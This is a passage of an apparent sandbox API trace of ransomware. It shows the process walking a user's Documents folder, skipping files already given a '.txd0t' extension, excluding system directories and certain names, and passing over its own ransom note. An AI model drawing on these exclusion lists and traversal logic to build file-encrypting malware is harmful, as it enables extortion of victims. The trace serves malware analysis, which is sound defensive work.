psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0119.460] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="MXMHgMI.ods.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods.txd0t" [0119.460] PathFindExtensionW (pszPath="MXMHgMI.ods.txd0t") returned=".txd0t" [0119.460] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.460] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9261d20, ftCreationTime.dwHighDateTime=0x1d5eff2, ftLastAccessTime.dwLowDateTime=0xf3d4d290, ftLastAccessTime.dwHighDateTime=0x1d5e25b, ftLastWriteTime.dwLowDateTime=0x51a639c0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1fb7, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="Uct9z.odt.txd0t", cAlternateFileName="UCT9ZO~1.TXD")) returned 1 [0119.460] StrCmpW (psz1="Uct9z.odt.txd0t", psz2=".") returned 1 [0119.460] StrCmpW (psz1="Uct9z.odt.txd0t", psz2="..") returned 1 [0119.460] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0119.460] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0119.460] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="Uct9z.odt.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt.txd0t" [0119.460] PathFindExtensionW (pszPath="Uct9z.odt.txd0t") returned=".txd0t" [0119.460] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.461] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5d75360, ftCreationTime.dwHighDateTime=0x1d5e92c, ftLastAccessTime.dwLowDateTime=0xbf44d190, ftLastAccessTime.dwHighDateTime=0x1d5e0d2, ftLastWriteTime.dwLowDateTime=0x51a639c0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1498f, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="VcL01ptYXVDK5.rtf.txd0t", cAlternateFileName="VCL01P~1.TXD")) returned 1 [0119.461] StrCmpW (psz1="VcL01ptYXVDK5.rtf.txd0t", psz2=".") returned 1 [0119.461] StrCmpW (psz1="VcL01ptYXVDK5.rtf.txd0t", psz2="..") returned 1 [0119.461] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0119.461] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0119.461] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="VcL01ptYXVDK5.rtf.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf.txd0t" [0119.461] PathFindExtensionW (pszPath="VcL01ptYXVDK5.rtf.txd0t") returned=".txd0t" [0119.461] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.461] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3daa4410, ftCreationTime.dwHighDateTime=0x1d5ec82, ftLastAccessTime.dwLowDateTime=0x5ea14610, ftLastAccessTime.dwHighDateTime=0x1d5ea92, ftLastWriteTime.dwLowDateTime=0x51a89b43, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xa60f, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="VSf1IL-6_DKVGroXOg.docx.txd0t", cAlternateFileName="VSF1IL~1.TXD")) returned 1 [0119.461] StrCmpW (psz1="VSf1IL-6_DKVGroXOg.docx.txd0t", psz2=".") returned 1 [0119.461] StrCmpW (psz1="VSf1IL-6_DKVGroXOg.docx.txd0t", psz2="..") returned 1 [0119.461] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0119.461] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0119.461] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="VSf1IL-6_DKVGroXOg.docx.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx.txd0t" [0119.461] PathFindExtensionW (pszPath="VSf1IL-6_DKVGroXOg.docx.txd0t") returned=".txd0t" [0119.461] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.461] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d8a610, ftCreationTime.dwHighDateTime=0x1d5ef08, ftLastAccessTime.dwLowDateTime=0xa080e8e0, ftLastAccessTime.dwHighDateTime=0x1d5e125, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12451, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="w3sXXqR.xlsx.txd0t", cAlternateFileName="W3SXXQ~1.TXD")) returned 1 [0119.461] StrCmpW (psz1="w3sXXqR.xlsx.txd0t", psz2=".") returned 1 [0119.461] StrCmpW (psz1="w3sXXqR.xlsx.txd0t", psz2="..") returned 1 [0119.461] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0119.461] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0119.461] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="w3sXXqR.xlsx.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx.txd0t" [0119.461] PathFindExtensionW (pszPath="w3sXXqR.xlsx.txd0t") returned=".txd0t" [0119.461] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.461] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x975770, ftCreationTime.dwHighDateTime=0x1d5e9ad, ftLastAccessTime.dwLowDateTime=0x51b6eaa7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="_HV0qcp0pks", cAlternateFileName="_HV0QC~1")) returned 1 [0119.461] StrCmpW (psz1="_HV0qcp0pks", psz2=".") returned 1 [0119.461] StrCmpW (psz1="_HV0qcp0pks", psz2="..") returned 1 [0119.461] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0119.461] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0119.461] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="_HV0qcp0pks", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0119.461] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\windows\\system32\\") returned 0x0 [0119.461] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.461] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\windows\\system\\") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\appdata\\local\\") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\boot\\") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\perflogs\\") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\programdata\\") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\drivers\\") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\wsus\\") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="crypt_detect") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="cryptolocker") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="ransomware") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="C:\\WINDOWS") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.462] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="C:\\Program Files") returned 0x0 [0119.462] GetProcessHeap () returned 0xe30000 [0119.462] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x50c) returned 0x680dae8 [0119.462] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0119.462] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\*", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\*") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\*" [0119.462] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\*", lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x975770, ftCreationTime.dwHighDateTime=0x1d5e9ad, ftLastAccessTime.dwLowDateTime=0x51b6eaa7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1930 [0119.463] StrCmpW (psz1=".", psz2=".") returned 0 [0119.463] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x975770, ftCreationTime.dwHighDateTime=0x1d5e9ad, ftLastAccessTime.dwLowDateTime=0x51b6eaa7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.463] StrCmpW (psz1="..", psz2=".") returned 1 [0119.463] StrCmpW (psz1="..", psz2="..") returned 0 [0119.463] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51aafdfc, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51aafdfc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51ad86aa, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.463] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.463] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.463] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0119.463] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0119.463] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\!TXDOT_READ_ME!.txt" [0119.463] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.463] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.463] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.463] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.463] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.463] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.463] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.463] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.463] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.463] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.463] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.463] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.463] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.463] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.463] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.463] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.463] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5030a3b0, ftCreationTime.dwHighDateTime=0x1d5eb9f, ftLastAccessTime.dwLowDateTime=0x7ca2aee0, ftLastAccessTime.dwHighDateTime=0x1d5ee6d, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3791, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="iTea.pptx.txd0t", cAlternateFileName="ITEAPP~1.TXD")) returned 1 [0119.463] StrCmpW (psz1="iTea.pptx.txd0t", psz2=".") returned 1 [0119.463] StrCmpW (psz1="iTea.pptx.txd0t", psz2="..") returned 1 [0119.463] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0119.463] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0119.463] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="iTea.pptx.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx.txd0t" [0119.463] PathFindExtensionW (pszPath="iTea.pptx.txd0t") returned=".txd0t" [0119.464] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.464] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf065b200, ftCreationTime.dwHighDateTime=0x1d5e1e3, ftLastAccessTime.dwLowDateTime=0xdee60400, ftLastAccessTime.dwHighDateTime=0x1d5e5e7, ftLastWriteTime.dwLowDateTime=0x51ad86aa, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x113d8, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="PoJjjS_vt-KW.doc.txd0t", cAlternateFileName="POJJJS~1.TXD")) returned 1 [0119.464] StrCmpW (psz1="PoJjjS_vt-KW.doc.txd0t", psz2=".") returned 1 [0119.464] StrCmpW (psz1="PoJjjS_vt-KW.doc.txd0t", psz2="..") returned 1 [0119.464] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0119.464] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0119.464] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="PoJjjS_vt-KW.doc.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc.txd0t" [0119.464] PathFindExtensionW (pszPath="PoJjjS_vt-KW.doc.txd0t") returned=".txd0t" [0119.464] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.464] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f46e60, 